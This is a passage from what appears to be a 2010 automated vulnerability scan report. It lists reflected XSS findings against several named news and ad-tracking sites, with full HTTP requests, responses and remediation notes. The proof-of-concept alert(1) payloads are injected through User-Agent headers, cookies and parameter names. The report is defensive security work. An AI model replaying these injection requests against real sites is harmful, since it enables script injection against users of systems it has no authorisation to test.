Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31b30"-alert(1)-"e139f47c396
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:32 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:02:31 GMT
Expires: Sun, 10 Apr 2011 19:02:31 GMT
Etag: s200805.p200805
Content-Length: 177610
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31b30"-alert(1)-"e139f47c396"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52b59"-alert(1)-"43e08bcb0f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topics.asp?node_id=1341 HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52b59"-alert(1)-"43e08bcb0f0
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:16:24 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:16:22 GMT
Expires: Sun, 10 Apr 2011 19:16:22 GMT
Etag: s200805.p200805
Content-Length: 254331
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52b59"-alert(1)-"43e08bcb0f0"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94bc6"-alert(1)-"10dc9164079 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webinar_archives.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94bc6"-alert(1)-"10dc9164079
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:04:07 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 324623
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94bc6"-alert(1)-"10dc9164079"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4295"-alert(1)-"7040ddc3224 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webinars.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4295"-alert(1)-"7040ddc3224
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:36 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 183275
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4295"-alert(1)-"7040ddc3224"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c816"-alert(1)-"2696a673d7f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /util/download.jhtml HTTP/1.1
Host: www.ondemanditgovernance.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c816"-alert(1)-"2696a673d7f
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:02:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:02:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=RQXR5DBC30VMDQE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 7195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> < ...[SNIP]...
var s_prop1=""; var s_prop2=""; var s_prop3=""; var s_prop4=""; var s_prop5=""; var s_prop6=""; var s_prop7=""; var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9c816"-alert(1)-"2696a673d7f"; var s_prop9=""; var s_prop10=""; var s_prop11=""; var s_prop12=""; var s_prop14=""; var s_prop15=""; var s_prop16=""; var s_prop19="False";
/* E-commerce Variables */ var s_campaign=""; ...[SNIP]...
3.1004. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c7345--><script>alert(1)</script>b2e8fd9820c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?c7345--><script>alert(1)</script>b2e8fd9820c=1 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_cc=true; s_sq=%5B%5BB%5D%5D; s_lv=1292111917529; s_lv_s=More%20than%207%20days
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2F%3Fc7345--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb2e8fd9820c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/?c7345--><script>alert(1)</script>b2e8fd9820c=1"> ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 678be<script>alert(1)</script>24c3516d751 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1678be<script>alert(1)</script>24c3516d751; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:22 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:22 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1678be<script>alert(1)</script>24c3516d751', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "BMX_G": ' ...[SNIP]...
The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 3102f<script>alert(1)</script>e3adabc011d was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=12921108593102f<script>alert(1)</script>e3adabc011d;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:29 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:29 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... -1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=12921108593102f<script>alert(1)</script>e3adabc011d', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload f03f8<script>alert(1)</script>ece97109cf6 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0f03f8<script>alert(1)</script>ece97109cf6; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:25 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:25 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0f03f8<script>alert(1)</script>ece97109cf6', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14 ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 36dc5<script>alert(1)</script>1cef8ae22e9 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-128892237236dc5<script>alert(1)</script>1cef8ae22e9; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:26 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:26 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... 4:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-128892237236dc5<script>alert(1)</script>1cef8ae22e9', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_708 ...[SNIP]...
The value of the ar_70821733 cookie is copied into the HTML document as plain text between tags. The payload bc54f<script>alert(1)</script>7f3ceeb4ca0 was submitted in the ar_70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&bc54f<script>alert(1)</script>7f3ceeb4ca0; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:21:24 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:21:24 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006
({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov ...[SNIP]... "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&bc54f<script>alert(1)</script>7f3ceeb4ca0', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&' });
The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload d6675<script>alert(1)</script>095736833d1 was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
